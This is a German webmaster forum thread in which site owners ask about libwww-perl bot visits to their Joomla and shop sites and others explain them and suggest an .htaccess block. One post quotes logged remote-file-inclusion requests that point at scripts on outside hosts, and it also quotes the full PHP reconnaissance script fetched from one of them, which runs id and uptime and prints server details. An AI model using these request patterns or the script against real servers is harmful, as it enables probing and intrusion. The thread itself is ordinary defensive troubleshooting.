LibWWW

Beitrag von **1aaaa** » 25.09.2006, 16:10

Hi!

Ich habe heute auf einer Seite, auf der sich üblicherweise erst 3 oder 4 Besucher am Tag tummeln ca. 50 gehabt. Unterschiedliche Länder, unterschiedliche IPs. Einzige Gemeinsamkeit ist der Browser - "LibWWW" steht da. Übrigens, die Seite ist mit Joomla gemacht und ich habe die Zoom Gallery.

Es wurden immer Seiten wie
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_unix.php/
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_win32.php/
...component/option,com_zoom/Itemid,26/components/com_zoom/classes/fs_win32.php/
aufgerufen.

Was ist da im Busch? kann da jemand was mit anfangen? Übrigens gibt es die Seiten so nicht, man kommt so immer auf die Galerieübersicht, deren URL ich aber mit OpenSEF auf.../Galerie umgebaut habe.

Schönen Gruss.

von **Anzeige von ABAKUS** »

Beitrag von **Anonymous** » 25.09.2006, 18:44

libWWW ist ein perl modul.... ich würde sagen da sucht ein script über proxys nach einer bestimmten schwachstelle....

Beitrag von **1aaaa** » 26.09.2006, 00:45

......... hmmmm.

ich glaub ich meld mich mal im joomlaforum an und frag da nach. hatte die tage auch schon 2 "useranmeldungen", obwohl das entsprechende modul gar nicht veröffentlicht war.

danke dir.

Beitrag von **Viktor1982** » 10.11.2008, 11:03

Hallo ,

bei mir seid zwei Tagen das gleiche Problem , anscheinend sucht jemand eine Schwachstelle bei mir im Shop

Oder sehr wahrscheinlich nach dem Passwort.

Hat folgendes bei mir aufgerufen:

Hostname www.sitelift.de

//modules/mods_full/shopping_cart/includes/errors.php?error=https://fantalaranja.t35.com/idr0x.txt???

mit libWWW und die seite hat folgenden Inhalt:

<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}

return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "narasaon ";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "narasaon was here .. ";
echo "uname -a: $un ";
echo "os: $os ";
echo "uptime: $up ";
echo "id: $id1 ";
echo "pwd: $pwd1 ";
echo "php: $php1 ";
echo "software: $sof1 ";
echo "server-name: $name1 ";
echo "server-ip: $ip1 ";
echo "free: $free ";
echo "used: $used ";
echo "total: $all ";
exit;

weiß den jamand was dies bedeutet

gestern das gleiche mit verschiedenen IPS

/?Language=https://www.viponline.com.br/alb.txt%3f

aber hat wohl seine spur verwischt hmmmmmmmmm

wie kann man libWWW komplett sperren in der .htaccess ?

Beitrag von **Mork vom Ork** » 10.11.2008, 11:39

Viktor1982 hat geschrieben:anscheinend sucht jemand eine Schwachstelle bei mir im Shop

Das ist nichts Besonderes. Lass' ihn suchen und seine Zeit verschwenden, denn du hast ja sicher immer aktuelle Software.

//modules/mods_full/shopping_cart/includes/errors.php?error=https://fantalaranja.t35.com/idr0x.txt???

Offensichtlich lässt (oder ließ) sich dein Skript errors.php mit dem Parameter error dazu verleiten, von irgendwo auf der Welt ein Skript runterzuladen und auszuführen. Sowas ist natürlich extrem dumm.

echo "narasaon was here .. ";
echo "uname -a: $un ";
echo "os: $os ";
echo "uptime: $up ";
echo "id: $id1 ";
echo "pwd: $pwd1 ";
echo "php: $php1 ";
echo "software: $sof1 ";
echo "server-name: $name1 ";
echo "server-ip: $ip1 ";
echo "free: $free ";
echo "used: $used ";
echo "total: $all ";
exit;

weiß den jamand was dies bedeutet

Das Skript spuckt lediglich ein paar erstmal unverfängliche Serverdaten aus: Betriebssystem, IP-Adresse, Plattenspeicher usw. Das Kürzel "pwd" bedeutet übrigens nicht "password", sondern steht für "print work(ing) directory", also das derzeitige Arbeitsverzeichnis.

wie kann man libWWW komplett sperren in der .htaccess ?

Das kannst du, aber dann sperrst du lediglich die Gelangweilten aus, die vor lauter Trübsinn sich nicht einmal dazu aufraffen konnten, libwww eine unverdächtigere Browserkennung übermitteln zu lassen - die sind keine Gefahr, die machen sich lediglich einen kleinen Spaß daraus, schlampige Seitenbetreiber, die aus Bequemlichkeit oder Unwissenheit auf Softwareupdates verzichten, bloßzustellen.

Aussperren kannst du Browser mittels Deny. Wenn du dort in der Anleitung dem Verweis zum Gegenstück Allow folgst, findest du ein fast passendes Beispiel.

Beitrag von **whyte** » 10.11.2008, 11:39

Code: Alles auswählen

RewriteEngine On

# block bad bots
RewriteCond %&#123;HTTP_USER_AGENT&#125; ^libwww-perl
RewriteRule ^.* - &#91;F,L&#93;

oder besser gleich mal die komplette Liste:
https://www.server-wissen.de/security/h ... erren.html

Gruß
Marco

Beitrag von **Viktor1982** » 10.11.2008, 11:47

Ja ich verwende eigentlich den sicheren Fork ,

Super Antwort und super Forum hat weitergeholfen Vielen Dank !

Beitrag von **Ice Man** » 10.11.2008, 12:49

jo, den kenn ich.
Wer ein phpbb Forum hat, der wurde von dem schon oft besucht.
Der hat auch immer nach Schachstellen gesucht.
Oft nach den, die durch das neueste Sicherheitsupdate gefixt werden sollten.